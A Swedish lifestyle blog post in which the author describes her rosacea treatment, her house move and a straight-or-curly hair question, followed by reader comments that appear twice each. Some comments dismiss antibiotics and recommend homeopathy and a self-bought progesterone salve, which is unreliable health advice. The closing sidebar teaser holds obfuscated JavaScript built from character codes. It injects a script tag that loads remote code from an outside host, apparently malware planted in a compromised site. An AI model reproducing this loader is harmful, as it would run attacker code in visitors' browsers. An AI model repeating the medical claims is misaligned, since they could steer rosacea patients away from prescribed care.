Rakt eller lockigt? Så behandlar du din rosacea

IMG_7500 IMG_7501

Godmorgon fina du!

Hoppas du sovit gott! Min sömn är katastrofal! Jag har fått sömntabletter utskrivna, som jag ska hämta ut. Vi får väl se hur det går…. Jag mår lite bättre idag.

Känner mig så nöjd med gårdagen. Fick mycket gjort trots en sen start. Det gör SÅ stor skillnad för inre stress och samvete.

Jag Packade fyra kartonger. Tvättade två maskiner, slängde två säckar med skräp (🙈😵) samlade ihop en kasse med leksaker till förskolan. Rensade frysen och skickade över det till grannen. Körde en Bloppis. WOW vilket intresse ☺️🙏🏻

Så kul! Nästa bloppis kommer ikväll…

 Nu har jag försökt sminka över mitt såriga ansikte. Vill göra mig lite fin ☺️

Min rosacea bråkar nu. (Se bilden längst ner. En vecka innan medecin)

 Många frågar vad jag använder. Salvan heter, kommer inte ihåg. Kollat sen, även denna är på recept . Jag har även en antibiotika som heter Erymax. Detta i kombination med milda och skonsamma produkter ifrån Cetaphil. Usch! Rosacean är fruktansvärd! Men mitt tippa till DIG som också har rosacea är att du tar kontakt med din läkare och STÅ på dig!  Du behöver receptbelagd salva och antibiotika för att få bort det. Sen bör du såklart kombinera det med milda och skonsamma produkter för just roscacea.☺️ 

Nog om det.

Idag ska jag in till stan och bleka tänderna på förmiddagen. Då vill jag vara lite fin. Började locka håret. Tar alltid en sida åt gången. Tanken slog mig när jag var klar med ena sidan.

Vad tycker du är finast?

-Rakt eller lockigt?

Hörs sen! Stor kram 😘

/My Martens

IMG_5616

Såhär såg det ut för 12 dagar sedan… såhär ser det ut efter ca 10 dagars behandling. Jag svarar bra på medicinen denna gången….. tur 🙏🏻 Det är inte alltid en självklart.

Det värsta är inte att det är ”fullt”. Det värsta för mig är att det kliar, svider och nästan ”bubblar” under hyn. Det vätskar sig och gör riktigt ont! Blääää för rosacea! 😝 Jag skämdes mycket förr. Gömde mig och skulle aldrig vågar lägga upp en bild. Men jag tycker att vi ska väga vara ärliga och inte alltid visa ”perfekta” selfies och bilder.. ☺️

-girl power! 👊🏻🌈

Du duger som du är…. glöm aldrig det! ❤️

IMG_8977

60 Komentarer

 1. Varför har du inte en flyttbil som går lagom tills du får tillgång till lägenheten? Är det så smart att åka på midsommarfirande och bleka tänder när man är mitt uppe i en flytt? Du kunde varit hemma och packat och städat istället.

  • Nämen, se där!!! En representant från logistikförbundet minsann! Jag har ett oerhört kaotiskt liv och skulle verkligen behöva en så strukturerad och disciplinerad kommendör som du anonym att säga vad jag borde och inte borde göra. Fakturerar du per timme eller betalar man direkt till ditt förbund? Vore bra att veta. Men ps om du åtar dig uppdraget att reda upp mitt och andras liv så var noga med att märka allt med ”reklam”… för säkerhets skull menar jag.
   My, jag har sagt det förut och säger det igen: du är stark och en förebild med din ärlighet i denna ytliga värld!! Lycka till med flytten, du gör rätt! Kram ?

  • Anonym Vad har du med det att göra .
   My får göra vad hon känner är bäst för henne.
   Hoppas att det går bra för My hon är den starkaste människan
   som jag har läst om. Så! Anonym lägg av. Vet förresten att det går bra för My hon klarar allt. Så stötta henne istället för en massa elakheter. Annars sluta och läs här Anonym

 2. Det var ju mycket du fick gjort igår ? Det känns nog bättre när du inte skjuter det framför dig (lätt att säga).
  Jag tycker du är otrolig stark o modig som vågar lägga ut bild på dig när rosacean jävlas (vet i tusan om jag hade vågat det ) ?
  Du är fin i både rakt o lockigt hår ?

 3. Jag tycker om fönat hår med rundborsten. Ger en fräsch känsla och intryck. Lockat kan vara fint , men oftast tycker jag det ser ut som dockhår. Beach wave lockar är snyggast !!
  Tycker dock man ska se ut som man vill, trots va folk tycker
  Kram till dig My ❤️

 4. Jag tycker att du ska ha håret rakt! Det är så fint och ser naturligt ut! Du passar jättebra i det. Lycka till med flytten!

 5. Du passar i vilket som. Nu har du ju en fin längd också så att du kan sätta upp håret i olika uppsättningar vilket är jättefint. Du passar väldigt bra när du har sidbena och uppsatt, som på bilden du hade på din firmabil.

 6. Varför har du inte en flyttbil som går lagom tills du får tillgång till lägenheten? Är det så smart att åka på midsommarfirande och bleka tänder när man är mitt uppe i en flytt? Du kunde varit hemma och packat och städat istället.

  • Nämen, se där!!! En representant från logistikförbundet minsann! Jag har ett oerhört kaotiskt liv och skulle verkligen behöva en så strukturerad och disciplinerad kommendör som du anonym att säga vad jag borde och inte borde göra. Fakturerar du per timme eller betalar man direkt till ditt förbund? Vore bra att veta. Men ps om du åtar dig uppdraget att reda upp mitt och andras liv så var noga med att märka allt med ”reklam”… för säkerhets skull menar jag.
   My, jag har sagt det förut och säger det igen: du är stark och en förebild med din ärlighet i denna ytliga värld!! Lycka till med flytten, du gör rätt! Kram 🙂

  • Anonym Vad har du med det att göra .
   My får göra vad hon känner är bäst för henne.
   Hoppas att det går bra för My hon är den starkaste människan
   som jag har läst om. Så! Anonym lägg av. Vet förresten att det går bra för My hon klarar allt. Så stötta henne istället för en massa elakheter. Annars sluta och läs här Anonym

 7. Det var ju mycket du fick gjort igår 😄 Det känns nog bättre när du inte skjuter det framför dig (lätt att säga).
  Jag tycker du är otrolig stark o modig som vågar lägga ut bild på dig när rosacean jävlas (vet i tusan om jag hade vågat det ) 💕
  Du är fin i både rakt o lockigt hår 😄

 8. Jobbigt med rosacean. Hoppas att den snart blir bättre för dig. Tycker att du är fin både i lockigt och rakt.Är ju kul att variera det,så kör lite på vilket humör du har för dagen.Lockigt blir ju lite mer romantiskt och rakt lite tuffare. Lycka till med flytten.Ha en fortsatt härlig dag. Kram

 9. Mitt tips är att inte ta en stark kur antibiotika som slår ut kroppen! Jag har haft riktigt illa och fick både kortisonsalva och antibiotika. Tog det dock inte! Sökte efter alternativ hjälp.. började med Efamol jättenattljusolja/tabletter i kur! Samt att jag gick på AHA syra behandlingskur hos en duktig hudterapeut – ska vara Exuviance samt använde dag och nattkräm från dem. Huden blev fantastiskt fin och jag har inte haft utbrott sedan dess, nu 4 år sedan. Trots att jag varit väldigt sjuk pga stress har det inte blossat upp! Fantastiskt – så mitt tips till dig är att testa detta. Maila mig om du vill ha mer info!

 10. Jag tycker om fönat hår med rundborsten. Ger en fräsch känsla och intryck. Lockat kan vara fint , men oftast tycker jag det ser ut som dockhår. Beach wave lockar är snyggast !!
  Tycker dock man ska se ut som man vill, trots va folk tycker
  Kram till dig My ❤️

 11. Jag tycker att du ska ha håret rakt! Det är så fint och ser naturligt ut! Du passar jättebra i det. Lycka till med flytten!

 12. Du passar i vilket som. Nu har du ju en fin längd också så att du kan sätta upp håret i olika uppsättningar vilket är jättefint. Du passar väldigt bra när du har sidbena och uppsatt, som på bilden du hade på din firmabil.

 13. Jobbigt med rosacean. Hoppas att den snart blir bättre för dig. Tycker att du är fin både i lockigt och rakt.Är ju kul att variera det,så kör lite på vilket humör du har för dagen.Lockigt blir ju lite mer romantiskt och rakt lite tuffare. Lycka till med flytten.Ha en fortsatt härlig dag. Kram

 14. Mitt tips är att inte ta en stark kur antibiotika som slår ut kroppen! Jag har haft riktigt illa och fick både kortisonsalva och antibiotika. Tog det dock inte! Sökte efter alternativ hjälp.. började med Efamol jättenattljusolja/tabletter i kur! Samt att jag gick på AHA syra behandlingskur hos en duktig hudterapeut – ska vara Exuviance samt använde dag och nattkräm från dem. Huden blev fantastiskt fin och jag har inte haft utbrott sedan dess, nu 4 år sedan. Trots att jag varit väldigt sjuk pga stress har det inte blossat upp! Fantastiskt – så mitt tips till dig är att testa detta. Maila mig om du vill ha mer info!

 15. Nu har jag inte rosacea. Men har haft extremt mycket vuxenacne. Har under många år gått hos en hudläkare som till slut sa att jag får lära mig att leva med det. Tog kontakt med Skincity.se. med hjälp av en fantastisk hudterapeut där hittade vi diverse produkter. Och de hjälpte! Efter bara tre månadervar det stor förändring. Efter 1 år var all acne borta och med hjälp av Skincity får jag hela tiden hjälp att hitta produkter som passar. Kan tyckas konstigt att ha kontakt och skicka bilder via mail. Trodde aldrig att det skulle funka. Men det har det verkligen gjort. Vet så många som fått hjälp av Skincity. Hoppas du hittar nåt som funkar för dig My.

 16. Rakt tycker jag?? men fint med lockigt oxå fast lite mer vågigt om du förstår, inga korkskruvar?
  Äter oxå erymax just nu för min jobbiga rosacea, den verkar funka bra men tyvärr vet man ju att det är en tillfällig lösning?
  Såg att nån tipsade om efamol, de ska jag kika in?

 17. Just det My. Man duger som man är.
  Är man vacker på insidan så blir hela människan vacker
  Hoppas du förstår hur jag menar
  Kram

 18. Nu har jag inte rosacea. Men har haft extremt mycket vuxenacne. Har under många år gått hos en hudläkare som till slut sa att jag får lära mig att leva med det. Tog kontakt med Skincity.se. med hjälp av en fantastisk hudterapeut där hittade vi diverse produkter. Och de hjälpte! Efter bara tre månadervar det stor förändring. Efter 1 år var all acne borta och med hjälp av Skincity får jag hela tiden hjälp att hitta produkter som passar. Kan tyckas konstigt att ha kontakt och skicka bilder via mail. Trodde aldrig att det skulle funka. Men det har det verkligen gjort. Vet så många som fått hjälp av Skincity. Hoppas du hittar nåt som funkar för dig My.

 19. Rakt tycker jag👏🙌 men fint med lockigt oxå fast lite mer vågigt om du förstår, inga korkskruvar😘
  Äter oxå erymax just nu för min jobbiga rosacea, den verkar funka bra men tyvärr vet man ju att det är en tillfällig lösning😕
  Såg att nån tipsade om efamol, de ska jag kika in🤗

 20. Just det My. Man duger som man är.
  Är man vacker på insidan så blir hela människan vacker
  Hoppas du förstår hur jag menar
  Kram

 21. Alltså antibiotika hjälper för stunden men är INTE bra för din kropp och immunförsvar jag gillar inte snabba lösningar utan vill ta reda på orsak, läkarna vill bara medicinera bort och inte ta tag i symptomen…jag tar alltid reda på orsak och min rosacea började pga brist på vissa hormoner (kollade hos en homopat) så jag boostade upp mina hormoner(det som var lågt för mig vara progesteron) så köpte en naturlig progesteron salva på femalebalance har aldrig varit så fin?? Sen letade jag på bra produkter toppenviktigt och jag rekommenderar Exuviance det bästa av allt MEN man får inte ge upp blir alltid värre innan det blir bättre (köper mitt på skincity)

 22. Glömde att jag har börjat äta Borago hud & hormon kapslar från hälsokost dem bidrar till normal hud och bidrar till att reglera den hormonella balansen ??????????

 23. Alltså antibiotika hjälper för stunden men är INTE bra för din kropp och immunförsvar jag gillar inte snabba lösningar utan vill ta reda på orsak, läkarna vill bara medicinera bort och inte ta tag i symptomen…jag tar alltid reda på orsak och min rosacea började pga brist på vissa hormoner (kollade hos en homopat) så jag boostade upp mina hormoner(det som var lågt för mig vara progesteron) så köpte en naturlig progesteron salva på femalebalance har aldrig varit så fin👍🏻 Sen letade jag på bra produkter toppenviktigt och jag rekommenderar Exuviance det bästa av allt MEN man får inte ge upp blir alltid värre innan det blir bättre (köper mitt på skincity)

 24. Glömde att jag har börjat äta Borago hud & hormon kapslar från hälsokost dem bidrar till normal hud och bidrar till att reglera den hormonella balansen 👍🏻👍🏻👍🏻👍🏻🙌🏻

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/